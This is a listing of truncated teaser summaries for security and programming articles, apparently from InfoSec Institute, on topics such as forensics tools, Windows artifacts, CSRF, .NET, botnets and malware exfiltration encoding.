File carving is a process used in computer forensics to extract data from a disk drive or other storage device without the assistance of the file system that originality created the file. It is a method that recovers files at unallocated space without any file information and is used […]
This article illustrates the theory and principle behind C++/CLI programming in a .NET CLR context. We shall investigate the remarkable features of C++/CLI programming, for instance its advantage over native C++ language with a CLR context. We’ll run through the basic mechanism to create and executed CLR console and […]
For Part I of these series, please visit this page: http://resources.infosecinstitute.com/windows-systems-and-artifacts-in-digital-forensics-part-i-registry/
This article begins with event logs and discusses their headers’ structure and the structure of their building blocks—the headers of the event records. It mentions some open source tools that can parse event logs and briefly explores event logs […]
Cross Site Request Forgery or CSRF is one of top 10 OWASP vulnerabilities. It exploits the website’s trust on the browser. This vulnerability harms users’ and can modify or delete users’ data by using user’s action. The advantage of the attack is that action is performed as a valid […]
Learning about artifacts in Windows is crucial for digital forensics examiners, as Windows accounts for most of the traffic in the world (91.8 of traffic comes from computers using Windows as their operating system as of 2013) and examiners will most likely encounter Windows and will have to collect […]
The purpose of this article is to show how to bypass various security checks by modifying binary code directly, rather than source code, through the use of CFF Explorer. We have already looked at the diverse ways of circumventing IL code earlier. There we have accomplished such crucial tasks […]
In this article we are going to learn how to configure ProFTPD service in a CentOS machine. After that we will conduct penetration testing to evaluate the security of FTP service and then we will also learn the countermeasures for vulnerabilities.
Installation and Configuration of FTP Service on Centos Linux […]
Helix3 is a live CD for doing computer forensic investigation and incident response. It is built on top of Ubuntu and comes in both free and commercial forms. This article will cover working with the free Helix Live CD. You can download the live CD from: https://www.e-fense.com/store/index.php?_a=viewProd&productId=11
I am currently […]
Over the year, we have learned innumerable ways of consuming services across the network such as Remoting, COM, COM+, MSMQ, Web Services using ASP.NET and DCOM. Every Technology has its advantage and disadvantage. This article commences by framing the need for WCF and examining the problems it intended to […]
This is a continuation of the first article on SANS Investigate Forensics Toolkit. In this article we will be covering the rest of the tools discussed earlier in the start of the article.
Maltego is an open source intelligence gathering and forensics tool. It provides a library of transforms for […]
The SANS Investigate Forensic Toolkit (SIFT) is an interesting tool created by the SANS Forensic Team and is available publicly and freely for the whole community. It comes with a set of preconfigured tools to perform computer forensic digital investigations. This is based on Ubuntu and has a long […]
Any good piece of malware eventually has to phone home. What good is collecting your dirty little secrets if it can’t capitalize on them? This article will help demonstrate how a little bit of forensic analysis can help you visualize where your data is going.
Web site access logs are […]
Volatility is one of the best open source software programs for analyzing RAM in 32 bit/64 bit systems. It supports analysis for Linux, Windows, Mac, and Android systems. It is based on Python and can be run on Windows, Linux, and Mac systems. It can analyze raw dumps, crash […]
Google Chrome is the most popular web browser of the world. It’s light weight and comes with a clean interface. This is the main reason of its popularity. It also has various other features that make website browsing easy and faster. Like Firefox, Chrome also supports add-ons but called […]
This article commences by taking a brief backward glimpse at COM then compares it with the way that components interact in .NET, and finally it takes a look at the tool provided by Microsoft to let these two technologies coordinate together. Essentially, COM is the antecedent technology to .NET. […]
There has been a large spread of Botnet-related threats in the web world recently. Now when we talk about botnets, it is basically a collection of code linked to each other through some communication mechanism through which it may get commands to perform certain actions. These may be also […]
Advanced Persistent Threats, as the name suggests, are advanced, persistent and deadly in their nature. The ghost of APTs can affect any organization at any moment of time. Security specialists have to face the ordeal of cracking the never-ending maze of APTs.
Security professionals need to employ a wide range […]
The term “multithread programming” may sound complicated, but it is quite easy to do in C#.net. This article explains how multithreading works on your typical, general-purpose computer. You will learn how the operating system manages thread execution and how to manipulate the Thread class in your program to create […]
Assemblies are the core units of deployment. At design time, we can examine the set of reference assemblies in CIL code with couple of external tools, Reflector and ildasm, to peek into the underlying metadata, MSIL code, and manifest. Hence, the triggering point behind writing this article is to […]
In this article we will see how malware encode or encrypt data that’s exfiltrated to the Command and Control Server from infected machines. This is often done using a custom encoding or encryption algorithm.
It is becoming increasingly common these days to see malware using this technique to prevent Security […]